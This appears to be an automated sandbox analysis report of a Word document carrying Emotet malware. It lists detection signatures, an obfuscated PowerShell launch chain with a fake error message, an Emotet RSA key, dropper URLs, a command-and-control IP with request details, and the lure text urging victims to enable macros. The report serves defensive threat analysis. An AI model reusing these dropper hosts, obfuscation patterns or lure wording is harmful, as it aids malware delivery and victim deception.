Analysis Report PACK.doc

Overview

General Information

Sample Name: PACK.doc
Analysis ID: 336504
MD5: d114fc2644da49f16a6be05bb0db6b08
SHA1: 6b5b6a9a5291b1b564ad3005c392ff1756ceef9e
SHA256: d9687c1ca0f341d62cf664cdfe3c9741f1f48df25129df53df9ae81979e89a5d

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2320 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2632 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2420 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2356 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2892 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2912 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2944 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2388 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 3036 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2284 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2452 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 944 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(27 entries in total)

Unpacked PEs

Source | Rule | Description | Author | Strings
16.2.rundll32.exe.200000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.200000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
10.2.rundll32.exe.1c0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.1d0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
18.2.rundll32.exe.700000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(40 entries in total)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://fnjbq.com/wp-includes/rlR/; Avira URL Cloud: Label: malware
Source: http://wap.zhonglisc.com/wp-includes/QryCB/; Avira URL Cloud: Label: malware
Source: http://petafilm.com/wp-admin/4m/; Avira URL Cloud: Label: malware
Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: petafilm.com; Virustotal: Detection: 6%
Source: http://petafilm.com; Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: PACK.doc; Virustotal: Detection: 30%
Source: PACK.doc; ReversingLabs: Detection: 50%
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_001F75AE CryptDecodeObjectEx,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_001F109C FindFirstFileW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic; DNS query: name: petafilm.com
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: http://givingthanksdaily.com/qlE/VeF/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in memory: https://somanap.com/wp-admin/P/
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: no-cache, must-revalidate | Pragma: no-cache | Content-Type: application/octet-stream | Expires: Wed, 06 Jan 2021 07:57:52 GMT | Last-Modified: Wed, 06 Jan 2021 07:57:52 GMT | Server: Microsoft-IIS/10.0 | Set-Cookie: 5ff56d802ad3f=1609919872; expires=Wed, 06-Jan-2021 07:58:52 GMT; Max-Age=60; path=/ | Content-Disposition: attachment; filename="bLH.dll" | Content-Transfer-Encoding: binary | X-Powered-By: ASP.NET | X-Powered-By-Plesk: PleskWin | Date: Wed, 06 Jan 2021 07:57:51 GMT | Content-Length: 192000 | Data Ascii: MZ@
Source: global traffic; HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1 | Host: petafilm.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 176.53.69.151 176.53.69.151
Source: Joe Sandbox View; IP Address: 5.2.136.90 5.2.136.90
Source: Joe Sandbox View; ASN Name: RADORETR RADORETR
Source: Joe Sandbox View; ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: global traffic; HTTP traffic detected: POST /6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ HTTP/1.1 | DNT: 0 | Referer: 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ | Content-Type: multipart/form-data; boundary=-------------------g8UsT9LwY8y8blrgAXk | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 5.2.136.90 | Content-Length: 6100 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown; TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_0020023A InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E1AD59AA-72A2-4470-89E8-B7D87A58E0E0}.tmp
Source: global traffic; HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1 | Host: petafilm.com | Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: petafilm.com
Source: unknown; HTTP traffic detected: POST /6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ HTTP/1.1 | DNT: 0 | Referer: 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ | Content-Type: multipart/form-data; boundary=-------------------g8UsT9LwY8y8blrgAXk | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 5.2.136.90 | Content-Length: 6100 | Connection: Keep-Alive | Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102091328.0000000003A04000.00000004.00000001.sdmp; String found in binary or memory: http://petafilm.com
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2103679489.000000001B8B0000.00000004.00000001.sdmp; String found in binary or memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp, rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp, rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp; String found in binary or memory: http://www.piriform.com/cc=
Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in binary or memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmp; String found in binary or memory: https://somanap.com/wp-admin/P/

E-Banking Fraud:

Yara detected Emotet
                      Source: Yara matchFile source: 00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2116945153.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2101721678.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2117172638.0000000000301000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2103560548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2101746597.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109151387.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114707003.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2100654563.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110616410.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2112015647.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106388395.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2119170548.0000000000291000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2351272233.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109044611.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106314094.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2100698593.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110668347.0000000000281000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2351339088.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2107874642.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2112073559.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2108018320.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099440995.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2112967165.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2119062368.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2105231881.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE

                      System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I I Word
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
